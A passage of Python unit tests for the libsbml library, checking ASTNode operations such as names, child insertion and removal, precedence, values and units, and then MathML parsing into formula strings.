libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_(( "a" == libsbml.formulaToString(node) )) self.assert_(( "a" == node.getName() )) i = node.freeName() self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( node.getName() == None ) i = node.freeName() self.assert_( i == libsbml.LIBSBML_UNEXPECTED_ATTRIBUTE ) self.assert_( node.getName() == None ) node.setType(libsbml.AST_UNKNOWN) i = node.freeName() self.assert_( i == libsbml.LIBSBML_UNEXPECTED_ATTRIBUTE ) self.assert_( node.getName() == None ) _dummyList = [ node ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_free_NULL(self): _dummyList = [ None ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_getName(self): n = libsbml.ASTNode() n.setName( "foo") self.assert_(( "foo" == n.getName() )) n.setType(libsbml.AST_NAME_TIME) self.assert_(( "foo" == n.getName() )) n.setName(None) self.assert_( n.getName() == None ) n.setType(libsbml.AST_CONSTANT_E) self.assert_(( "exponentiale" == n.getName() )) n.setType(libsbml.AST_CONSTANT_FALSE) self.assert_(( "false" == n.getName() )) n.setType(libsbml.AST_CONSTANT_PI) self.assert_(( "pi" == n.getName() )) n.setType(libsbml.AST_CONSTANT_TRUE) self.assert_(( "true" == n.getName() )) n.setType(libsbml.AST_LAMBDA) self.assert_(( "lambda" == n.getName() )) n.setType(libsbml.AST_FUNCTION) n.setName( "f") self.assert_(( "f" == n.getName() )) n.setType(libsbml.AST_FUNCTION_DELAY) self.assert_(( "f" == n.getName() )) n.setName(None) self.assert_(( "delay" == n.getName() )) n.setType(libsbml.AST_FUNCTION) self.assert_( n.getName() == None ) n.setType(libsbml.AST_FUNCTION_ABS) self.assert_(( "abs" == n.getName() )) n.setType(libsbml.AST_FUNCTION_ARCCOS) self.assert_(( "arccos" == n.getName() )) n.setType(libsbml.AST_FUNCTION_TAN) self.assert_(( "tan" == n.getName() )) n.setType(libsbml.AST_FUNCTION_TANH) self.assert_(( "tanh" == n.getName() )) n.setType(libsbml.AST_LOGICAL_AND) self.assert_(( "and" == n.getName() )) n.setType(libsbml.AST_LOGICAL_NOT) self.assert_(( "not" == n.getName() )) n.setType(libsbml.AST_LOGICAL_OR) self.assert_(( "or" == n.getName() )) n.setType(libsbml.AST_LOGICAL_XOR) self.assert_(( "xor" == n.getName() )) n.setType(libsbml.AST_RELATIONAL_EQ) self.assert_(( "eq" == n.getName() )) n.setType(libsbml.AST_RELATIONAL_GEQ) self.assert_(( "geq" == n.getName() )) n.setType(libsbml.AST_RELATIONAL_LT) self.assert_(( "lt" == n.getName() )) n.setType(libsbml.AST_RELATIONAL_NEQ) self.assert_(( "neq" == n.getName() )) _dummyList = [ n ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_getPrecedence(self): n = libsbml.ASTNode() n.setType(libsbml.AST_PLUS) self.assert_( n.getPrecedence() == 2 ) n.setType(libsbml.AST_MINUS) self.assert_( n.getPrecedence() == 2 ) n.setType(libsbml.AST_TIMES) self.assert_( n.getPrecedence() == 3 ) n.setType(libsbml.AST_DIVIDE) self.assert_( n.getPrecedence() == 3 ) n.setType(libsbml.AST_POWER) self.assert_( n.getPrecedence() == 4 ) n.setType(libsbml.AST_MINUS) n.addChild(libsbml.ASTNode(libsbml.AST_NAME)) self.assert_( n.isUMinus() == True ) self.assert_( n.getPrecedence() == 5 ) n.setType(libsbml.AST_NAME) self.assert_( n.getPrecedence() == 6 ) n.setType(libsbml.AST_FUNCTION) self.assert_( n.getPrecedence() == 6 ) _dummyList = [ n ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_getReal(self): n = libsbml.ASTNode() n.setType(libsbml.AST_REAL) n.setValue(1.6) self.assert_( n.getReal() == 1.6 ) n.setType(libsbml.AST_REAL_E) n.setValue(12.3,3) val = abs(n.getReal() - 12300.0) self.assert_( val < DBL_EPSILON ) n.setType(libsbml.AST_RATIONAL) n.setValue(1,2) self.assert_( n.getReal() == 0.5 ) _dummyList = [ n ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_insertChild(self): node = libsbml.ASTNode() c1 = libsbml.ASTNode() c2 = libsbml.ASTNode() c3 = libsbml.ASTNode() newc = libsbml.ASTNode() newc1 = libsbml.ASTNode() i = 0 node.setType(libsbml.AST_LOGICAL_AND) c1.setName( "a") c2.setName( "b") c3.setName( "c") node.addChild(c1) node.addChild(c2) node.addChild(c3) self.assert_( node.getNumChildren() == 3 ) self.assert_(( "and(a, b, c)" == libsbml.formulaToString(node) )) newc.setName( "d") newc1.setName( "e") i = node.insertChild(1,newc) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( node.getNumChildren() == 4 ) self.assert_(( "and(a, d, b, c)" == libsbml.formulaToString(node) )) i = node.insertChild(5,newc) self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE ) self.assert_( node.getNumChildren() == 4 ) self.assert_(( "and(a, d, b, c)" == libsbml.formulaToString(node) )) i = node.insertChild(2,newc1) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( node.getNumChildren() == 5 ) self.assert_(( "and(a, d, e, b, c)" == libsbml.formulaToString(node) )) _dummyList = [ node ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_isLog10(self): n = libsbml.ASTNode() n.setType(libsbml.AST_FUNCTION) self.assert_( n.isLog10() == False ) n.setType(libsbml.AST_FUNCTION_LOG) self.assert_( n.isLog10() == False ) c = libsbml.ASTNode() n.addChild(c) c.setValue(10) self.assert_( n.isLog10() == False ) n.addChild(libsbml.ASTNode()) self.assert_( n.isLog10() == True ) c.setValue(2) self.assert_( n.isLog10() == False ) _dummyList = [ n ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_isSqrt(self): n = libsbml.ASTNode() n.setType(libsbml.AST_FUNCTION) self.assert_( n.isSqrt() == False ) n.setType(libsbml.AST_FUNCTION_ROOT) self.assert_( n.isSqrt() == False ) c = libsbml.ASTNode() n.addChild(c) c.setValue(2) self.assert_( n.isSqrt() == False ) n.addChild(libsbml.ASTNode()) self.assert_( n.isSqrt() == True ) c.setValue(3) self.assert_( n.isSqrt() == False ) _dummyList = [ n ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_isUMinus(self): n = libsbml.ASTNode() n.setType(libsbml.AST_MINUS) self.assert_( n.isUMinus() == False ) n.addChild(libsbml.ASTNode(libsbml.AST_NAME)) self.assert_( n.isUMinus() == True ) _dummyList = [ n ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_no_children(self): node = libsbml.ASTNode() self.assert_( node.getNumChildren() == 0 ) self.assert_( node.getLeftChild() == None ) self.assert_( node.getRightChild() == None ) self.assert_( node.getChild(0) == None ) _dummyList = [ node ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_one_child(self): node = libsbml.ASTNode() child = libsbml.ASTNode() node.addChild(child) self.assert_( node.getNumChildren() == 1 ) self.assert_( node.getLeftChild() == child ) self.assert_( node.getRightChild() == None ) self.assert_( node.getChild(0) == child ) self.assert_( node.getChild(1) == None ) _dummyList = [ node ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_prependChild1(self): node = libsbml.ASTNode() c1 = libsbml.ASTNode() c2 = libsbml.ASTNode() c1_1 = libsbml.ASTNode() i = 0 node.setType(libsbml.AST_LOGICAL_AND) c1.setName( "a") c2.setName( "b") node.addChild(c1) node.addChild(c2) self.assert_( node.getNumChildren() == 2 ) self.assert_(( "and(a, b)" == libsbml.formulaToString(node) )) c1_1.setName( "d") i = node.prependChild(c1_1) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( node.getNumChildren() == 3 ) self.assert_(( "and(d, a, b)" == libsbml.formulaToString(node) )) self.assert_(( "d" == node.getChild(0).getName() )) self.assert_(( "a" == node.getChild(1).getName() )) self.assert_(( "b" == node.getChild(2).getName() )) _dummyList = [ node ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_removeChild(self): node = libsbml.ASTNode() c1 = libsbml.ASTNode() c2 = libsbml.ASTNode() i = 0 node.setType(libsbml.AST_PLUS) c1.setName( "foo") c2.setName( "foo2") node.addChild(c1) node.addChild(c2) self.assert_( node.getNumChildren() == 2 ) i = node.removeChild(0) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( node.getNumChildren() == 1 ) i = node.removeChild(1) self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE ) self.assert_( node.getNumChildren() == 1 ) i = node.removeChild(0) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( node.getNumChildren() == 0 ) _dummyList = [ node ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_replaceChild(self): node = libsbml.ASTNode() c1 = libsbml.ASTNode() c2 = libsbml.ASTNode() c3 = libsbml.ASTNode() newc = libsbml.ASTNode() i = 0 node.setType(libsbml.AST_LOGICAL_AND) c1.setName( "a") c2.setName( "b") c3.setName( "c") node.addChild(c1) node.addChild(c2) node.addChild(c3) self.assert_( node.getNumChildren() == 3 ) self.assert_(( "and(a, b, c)" == libsbml.formulaToString(node) )) newc.setName( "d") i = node.replaceChild(0,newc) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( node.getNumChildren() == 3 ) self.assert_(( "and(d, b, c)" == libsbml.formulaToString(node) )) i = node.replaceChild(3,newc) self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE ) self.assert_( node.getNumChildren() == 3 ) self.assert_(( "and(d, b, c)" == libsbml.formulaToString(node) )) i = node.replaceChild(1,c1) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( node.getNumChildren() == 3 ) self.assert_(( "and(d, a, c)" == libsbml.formulaToString(node) )) _dummyList = [ node ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_setCharacter(self): node = libsbml.ASTNode() node.setName( "foo") self.assert_( node.getType() == libsbml.AST_NAME ) self.assert_( node.getCharacter() == "\0" ) self.assert_(( "foo" == node.getName() )) self.assert_( node.getInteger() == 0 ) self.assert_( node.getReal() == 0 ) self.assert_( node.getExponent() == 0 ) self.assert_( node.getDenominator() == 1 ) node.setCharacter( '+') self.assert_( node.getType() == libsbml.AST_PLUS ) self.assert_( node.getCharacter() == '+' ) self.assert_( node.getName() == None ) self.assert_( node.getInteger() == 0 ) self.assert_( node.getReal() == 0 ) self.assert_( node.getExponent() == 0 ) self.assert_( node.getDenominator() == 1 ) node.setCharacter( '-') self.assert_( node.getType() == libsbml.AST_MINUS ) self.assert_( node.getCharacter() == '-' ) self.assert_( node.getName() == None ) self.assert_( node.getInteger() == 0 ) self.assert_( node.getReal() == 0 ) self.assert_( node.getExponent() == 0 ) self.assert_( node.getDenominator() == 1 ) node.setCharacter( '*') self.assert_( node.getType() == libsbml.AST_TIMES ) self.assert_( node.getCharacter() == '*' ) self.assert_( node.getName() == None ) self.assert_( node.getInteger() == 0 ) self.assert_( node.getReal() == 0 ) self.assert_( node.getExponent() == 0 ) self.assert_( node.getDenominator() == 1 ) node.setCharacter( '/') self.assert_( node.getType() == libsbml.AST_DIVIDE ) self.assert_( node.getCharacter() == '/' ) self.assert_( node.getName() == None ) self.assert_( node.getInteger() == 0 ) self.assert_( node.getReal() == 0 ) self.assert_( node.getExponent() == 0 ) self.assert_( node.getDenominator() == 1 ) node.setCharacter( '^') self.assert_( node.getType() == libsbml.AST_POWER ) self.assert_( node.getCharacter() == '^' ) self.assert_( node.getName() == None ) self.assert_( node.getInteger() == 0 ) self.assert_( node.getReal() == 0 ) self.assert_( node.getExponent() == 0 ) self.assert_( node.getDenominator() == 1 ) node.setCharacter( '$') self.assert_( node.getType() == libsbml.AST_UNKNOWN ) self.assert_( node.getCharacter() == '$' ) self.assert_( node.getName() == None ) self.assert_( node.getInteger() == 0 ) self.assert_( node.getReal() == 0 ) self.assert_( node.getExponent() == 0 ) self.assert_( node.getDenominator() == 1 ) _dummyList = [ node ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_setInteger(self): node = libsbml.ASTNode() node.setName( "foo") self.assert_( node.getType() == libsbml.AST_NAME ) self.assert_(( "foo" == node.getName() )) self.assert_( node.getCharacter() == "\0" ) self.assert_( node.getInteger() == 0 ) self.assert_( node.getReal() == 0 ) self.assert_( node.getExponent() == 0 ) self.assert_( node.getDenominator() == 1 ) node.setValue(3.2) self.assert_( node.getType() == libsbml.AST_REAL ) self.assert_( node.getInteger() == 0 ) self.assert_( node.getName() == None ) self.assert_( node.getCharacter() == "\0" ) self.assert_( node.getReal() == 3.2 ) self.assert_( node.getExponent() == 0 ) self.assert_( node.getDenominator() == 1 ) node.setValue(321) self.assert_( node.getType() == libsbml.AST_INTEGER ) self.assert_( node.getInteger() == 321 ) self.assert_( node.getName() == None ) self.assert_( node.getCharacter() == "\0" ) self.assert_( node.getReal() == 0 ) self.assert_( node.getExponent() == 0 ) self.assert_( node.getDenominator() == 1 ) _dummyList = [ node ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_setName(self): name = "foo"; node = libsbml.ASTNode() self.assert_( node.getType() == libsbml.AST_UNKNOWN ) node.setName(name) self.assert_( node.getType() == libsbml.AST_NAME ) self.assert_(( name == node.getName() )) self.assert_( node.getCharacter() == "\0" ) self.assert_( node.getInteger() == 0 ) self.assert_( node.getReal() == 0 ) self.assert_( node.getExponent() == 0 ) self.assert_( node.getDenominator() == 1 ) if (node.getName() == name): pass node.setName(None) self.assert_( node.getType() == libsbml.AST_NAME ) if (node.getName() != None): pass node.setType(libsbml.AST_FUNCTION_COS) self.assert_( node.getType() == libsbml.AST_FUNCTION_COS ) self.assert_(( "cos" == node.getName() )) self.assert_( node.getCharacter() == "\0" ) self.assert_( node.getInteger() == 0 ) self.assert_( node.getReal() == 0 ) self.assert_( node.getExponent() == 0 ) self.assert_( node.getDenominator() == 1 ) node.setType(libsbml.AST_PLUS) node.setName(name) self.assert_( node.getType() == libsbml.AST_NAME ) self.assert_(( name == node.getName() )) self.assert_( node.getCharacter() == '+' ) self.assert_( node.getInteger() == 0 ) self.assert_( node.getReal() == 0 ) self.assert_( node.getExponent() == 0 ) self.assert_( node.getDenominator() == 1 ) _dummyList = [ node ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_setName_override(self): node = libsbml.ASTNode(libsbml.AST_FUNCTION_SIN) self.assert_(( "sin" == node.getName() )) self.assert_( node.getType() == libsbml.AST_FUNCTION_SIN ) node.setName( "MySinFunc") self.assert_(( "MySinFunc" == node.getName() )) self.assert_( node.getType() == libsbml.AST_FUNCTION_SIN ) node.setName(None) self.assert_(( "sin" == node.getName() )) self.assert_( node.getType() == libsbml.AST_FUNCTION_SIN ) _dummyList = [ node ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_setReal(self): node = libsbml.ASTNode() node.setName( "foo") self.assert_( node.getType() == libsbml.AST_NAME ) node.setValue(32.1) self.assert_( node.getType() == libsbml.AST_REAL ) self.assert_( node.getInteger() == 0 ) self.assert_( node.getName() == None ) self.assert_( node.getCharacter() == "\0" ) self.assert_( node.getReal() == 32.1 ) self.assert_( node.getExponent() == 0 ) self.assert_( node.getDenominator() == 1 ) self.assert_( node.getMantissa() == 32.1 ) node.setValue(45,90) self.assert_( node.getType() == libsbml.AST_RATIONAL ) self.assert_( node.getInteger() == 45 ) self.assert_( node.getName() == None ) self.assert_( node.getCharacter() == "\0" ) self.assert_( node.getReal() == 0.5 ) self.assert_( node.getExponent() == 0 ) self.assert_( node.getDenominator() == 90 ) self.assert_( node.getMantissa() == 0 ) node.setValue(32.0,4) self.assert_( node.getType() == libsbml.AST_REAL_E ) self.assert_( node.getInteger() == 0 ) self.assert_( node.getName() == None ) self.assert_( node.getCharacter() == "\0" ) self.assert_( node.getReal() == 320000 ) self.assert_( node.getExponent() == 4 ) self.assert_( node.getDenominator() == 1 ) self.assert_( node.getMantissa() == 32 ) _dummyList = [ node ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_setType(self): node = libsbml.ASTNode() node.setName( "foo") self.assert_( node.getType() == libsbml.AST_NAME ) node.setType(libsbml.AST_FUNCTION) self.assert_( node.getType() == libsbml.AST_FUNCTION ) self.assert_(( "foo" == node.getName() )) node.setType(libsbml.AST_NAME) self.assert_( node.getType() == libsbml.AST_NAME ) self.assert_(( "foo" == node.getName() )) node.setType(libsbml.AST_INTEGER) self.assert_( node.getType() == libsbml.AST_INTEGER ) node.setType(libsbml.AST_REAL) self.assert_( node.getType() == libsbml.AST_REAL ) node.setType(libsbml.AST_UNKNOWN) self.assert_( node.getType() == libsbml.AST_UNKNOWN ) node.setType(libsbml.AST_PLUS) self.assert_( node.getType() == libsbml.AST_PLUS ) self.assert_( node.getCharacter() == '+' ) node.setType(libsbml.AST_MINUS) self.assert_( node.getType() == libsbml.AST_MINUS ) self.assert_( node.getCharacter() == '-' ) node.setType(libsbml.AST_TIMES) self.assert_( node.getType() == libsbml.AST_TIMES ) self.assert_( node.getCharacter() == '*' ) node.setType(libsbml.AST_DIVIDE) self.assert_( node.getType() == libsbml.AST_DIVIDE ) self.assert_( node.getCharacter() == '/' ) node.setType(libsbml.AST_POWER) self.assert_( node.getType() == libsbml.AST_POWER ) self.assert_( node.getCharacter() == '^' ) _dummyList = [ node ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_swapChildren(self): node = libsbml.ASTNode() c1 = libsbml.ASTNode() c2 = libsbml.ASTNode() node_1 = libsbml.ASTNode() c1_1 = libsbml.ASTNode() c2_1 = libsbml.ASTNode() i = 0 node.setType(libsbml.AST_LOGICAL_AND) c1.setName( "a") c2.setName( "b") node.addChild(c1) node.addChild(c2) self.assert_( node.getNumChildren() == 2 ) self.assert_(( "and(a, b)" == libsbml.formulaToString(node) )) node_1.setType(libsbml.AST_LOGICAL_AND) c1_1.setName( "d") c2_1.setName( "f") node_1.addChild(c1_1) node_1.addChild(c2_1) self.assert_( node_1.getNumChildren() == 2 ) self.assert_(( "and(d, f)" == libsbml.formulaToString(node_1) )) i = node.swapChildren(node_1) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( node.getNumChildren() == 2 ) self.assert_(( "and(d, f)" == libsbml.formulaToString(node) )) self.assert_( node_1.getNumChildren() == 2 ) self.assert_(( "and(a, b)" == libsbml.formulaToString(node_1) )) _dummyList = [ node_1 ]; _dummyList[:] = []; del _dummyList _dummyList = [ node ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_units(self): n = libsbml.ASTNode() n.setType(libsbml.AST_REAL) n.setValue(1.6) i = n.setUnits( "mole") self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( n.isSetUnits() == True ) self.assert_(( "mole" == n.getUnits() )) i = n.unsetUnits() self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( n.isSetUnits() == False ) self.assert_(( "" == n.getUnits() )) i = n.setUnits( "1mole") self.assert_( i == libsbml.LIBSBML_INVALID_ATTRIBUTE_VALUE ) self.assert_( n.isSetUnits() == False ) n.setType(libsbml.AST_FUNCTION) i = n.setUnits( "mole") self.assert_( i == libsbml.LIBSBML_UNEXPECTED_ATTRIBUTE ) self.assert_( n.isSetUnits() == False ) self.assert_(( "" == n.getUnits() )) _dummyList = [ n ]; _dummyList[:] = []; del _dummyList pass def suite(): suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(TestASTNode)) return suite if __name__ == "__main__": if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() : sys.exit(0) else: sys.exit(1) ``` #### File: test/math/TestReadMathML.py ```python import sys import unittest import libsbml def util_isInf(*x): return ( (x[0] == util_PosInf()) or (x[0] == util_NegInf()) ) def util_NaN(): z = 1e300 z = z * z return z - z def util_PosInf(): z = 1e300 z = z * z return z def util_NegInf(): z = 1e300 z = z * z return -z def wrapString(s): return s pass def MATHML_FOOTER(): return "</math>" pass def MATHML_HEADER(): return "<math xmlns='http://www.w3.org/1998/Math/MathML'>\n" pass def MATHML_HEADER_UNITS(): return "<math xmlns='http://www.w3.org/1998/Math/MathML'\n" pass def MATHML_HEADER_UNITS2(): return " xmlns:sbml='http://www.sbml.org/sbml/level3/version1/core'>\n" pass def XML_HEADER(): return "<?xml version='1.0' encoding='UTF-8'?>\n" pass def isnan(x): return (x != x) pass def wrapMathML(s): r = XML_HEADER() r += MATHML_HEADER() r += s r += MATHML_FOOTER() return r pass def wrapMathMLUnits(s): r = XML_HEADER() r += MATHML_HEADER_UNITS() r += MATHML_HEADER_UNITS2() r += s r += MATHML_FOOTER() return r pass def wrapXML(s): r = XML_HEADER() r += s return r pass class TestReadMathML(unittest.TestCase): global F F = None global N N = None def setUp(self): self.N = None self.F = None pass def tearDown(self): self.N = None self.F = None pass def test_element_abs(self): s = wrapMathML("<apply><abs/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "abs(x)" == self.F )) pass def test_element_and(self): s = wrapMathML("<apply> <and/> <ci>a</ci> <ci>b</ci> <ci>c</ci> </apply>" ) self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "and(a, b, c)" == self.F )) pass def test_element_arccos(self): s = wrapMathML("<apply><arccos/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "acos(x)" == self.F )) pass def test_element_arccosh(self): s = wrapMathML("<apply><arccosh/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "arccosh(x)" == self.F )) pass def test_element_arccot(self): s = wrapMathML("<apply><arccot/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "arccot(x)" == self.F )) pass def test_element_arccoth(self): s = wrapMathML("<apply><arccoth/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "arccoth(x)" == self.F )) pass def test_element_arccsc(self): s = wrapMathML("<apply><arccsc/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "arccsc(x)" == self.F )) pass def test_element_arccsch(self): s = wrapMathML("<apply><arccsch/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "arccsch(x)" == self.F )) pass def test_element_arcsec(self): s = wrapMathML("<apply><arcsec/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "arcsec(x)" == self.F )) pass def test_element_arcsech(self): s = wrapMathML("<apply><arcsech/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "arcsech(x)" == self.F )) pass def test_element_arcsin(self): s = wrapMathML("<apply><arcsin/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "asin(x)" == self.F )) pass def test_element_arcsinh(self): s = wrapMathML("<apply><arcsinh/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "arcsinh(x)" == self.F )) pass def test_element_arctan(self): s = wrapMathML("<apply><arctan/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "atan(x)" == self.F )) pass def test_element_arctanh(self): s = wrapMathML("<apply><arctanh/><ci> x </ci></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "arctanh(x)" == self.F )) pass def test_element_bug_apply_ci_1(self): s = wrapMathML("<apply>" + " <ci> Y </ci>" + " <cn> 1 </cn>" + "</apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_FUNCTION ) self.assert_(( "Y" == self.N.getName() )) self.assert_( self.N.getNumChildren() == 1 ) c = self.N.getLeftChild() self.assert_( c != None ) self.assert_( c.getType() == libsbml.AST_REAL ) self.assert_( c.getReal() == 1 ) self.assert_( c.getNumChildren() == 0 ) pass def test_element_bug_apply_ci_2(self): s = wrapMathML("<apply>" + " <ci> Y </ci>" + " <csymbol encoding='text' " + " definitionURL='http://www.sbml.org/sbml/symbols/time'> t </csymbol>" + "</apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_FUNCTION ) self.assert_(( "Y" == self.N.getName() )) self.assert_( self.N.getNumChildren() == 1 ) c = self.N.getLeftChild() self.assert_( c != None ) self.assert_( c.getType() == libsbml.AST_NAME_TIME ) self.assert_(( "t" == c.getName() )) self.assert_( c.getNumChildren() == 0 ) pass def test_element_bug_cn_e_notation_1(self): s = wrapMathML("<cn type='e-notation'> 2 <sep/> -8 </cn>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_REAL_E ) self.assert_( self.N.getMantissa() == 2.0 ) self.assert_( self.N.getExponent() == -8.0 ) self.assert_( self.N.getNumChildren() == 0 ) pass def test_element_bug_cn_e_notation_2(self): s = wrapMathML("<cn type='e-notation'> -3 <sep/> 4 </cn>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_REAL_E ) self.assert_( self.N.getMantissa() == -3.0 ) self.assert_( self.N.getExponent() == 4.0 ) self.assert_( self.N.getNumChildren() == 0 ) pass def test_element_bug_cn_e_notation_3(self): s = wrapMathML("<cn type='e-notation'> -6 <sep/> -1 </cn>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_REAL_E ) self.assert_( self.N.getMantissa() == -6.0 ) self.assert_( self.N.getExponent() == -1.0 ) self.assert_( self.N.getNumChildren() == 0 ) pass def test_element_bug_cn_integer_negative(self): s = wrapMathML("<cn type='integer'> -7 </cn>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_INTEGER ) self.assert_( self.N.getInteger() == -7 ) self.assert_( self.N.getNumChildren() == 0 ) pass def test_element_bug_csymbol_1(self): s = wrapMathML("<apply>" + " <gt/>" + " <csymbol encoding='text' " + " definitionURL='http://www.sbml.org/sbml/symbols/time'>time</csymbol>" + " <cn>5000</cn>" + "</apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_RELATIONAL_GT ) self.assert_( self.N.getNumChildren() == 2 ) c = self.N.getLeftChild() self.assert_( c != None ) self.assert_( c.getType() == libsbml.AST_NAME_TIME ) self.assert_(( "time" == c.getName() )) self.assert_( c.getNumChildren() == 0 ) c = self.N.getRightChild() self.assert_( c != None ) self.assert_( c.getType() == libsbml.AST_REAL ) self.assert_( c.getReal() == 5000 ) self.assert_( c.getNumChildren() == 0 ) pass def test_element_bug_csymbol_delay_1(self): s = wrapMathML("<apply>" + " <csymbol encoding='text' definitionURL='http://www.sbml.org/sbml/" + "symbols/delay'> my_delay </csymbol>" + " <ci> x </ci>" + " <cn> 0.1 </cn>" + "</apply>\n") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_FUNCTION_DELAY ) self.assert_(( "my_delay" == self.N.getName() )) self.assert_( self.N.getNumChildren() == 2 ) c = self.N.getLeftChild() self.assert_( c != None ) self.assert_( c.getType() == libsbml.AST_NAME ) self.assert_(( "x" == c.getName() )) self.assert_( c.getNumChildren() == 0 ) c = self.N.getRightChild() self.assert_( c != None ) self.assert_( c.getType() == libsbml.AST_REAL ) self.assert_( c.getReal() == 0.1 ) self.assert_( c.getNumChildren() == 0 ) pass def test_element_bug_math_xmlns(self): s = wrapXML("<foo:math xmlns:foo='http://www.w3.org/1998/Math/MathML'>" + " <foo:apply>" + " <foo:plus/> <foo:cn>1</foo:cn> <foo:cn>2</foo:cn>" + " </foo:apply>" + "</foo:math>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "1 + 2" == self.F )) pass def test_element_ceiling(self): s = wrapMathML("<apply><ceiling/><cn> 1.6 </cn></apply>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.F = libsbml.formulaToString(self.N) self.assert_(( "ceil(1.6)" == self.F )) pass def test_element_ci(self): s = wrapMathML("<ci> x </ci>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_NAME ) self.assert_(( "x" == self.N.getName() )) self.assert_( self.N.getNumChildren() == 0 ) pass def test_element_ci_definitionURL(self): s = wrapMathML("<ci definitionURL=\"foobar\"> x </ci>") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_NAME ) self.assert_(( "x" == self.N.getName() )) self.assert_( self.N.getNumChildren() == 0 ) self.assert_( self.N.getDefinitionURL().getValue(0) == "foobar" ) pass def test_element_ci_surrounding_spaces_bug(self): s = wrapMathML(" <ci> s </ci> ") self.N = libsbml.readMathMLFromString(s) self.assert_( self.N != None ) self.assert_( self.N.getType() == libsbml.AST_NAME ) self.assert_(( "s" == self.N.getName() 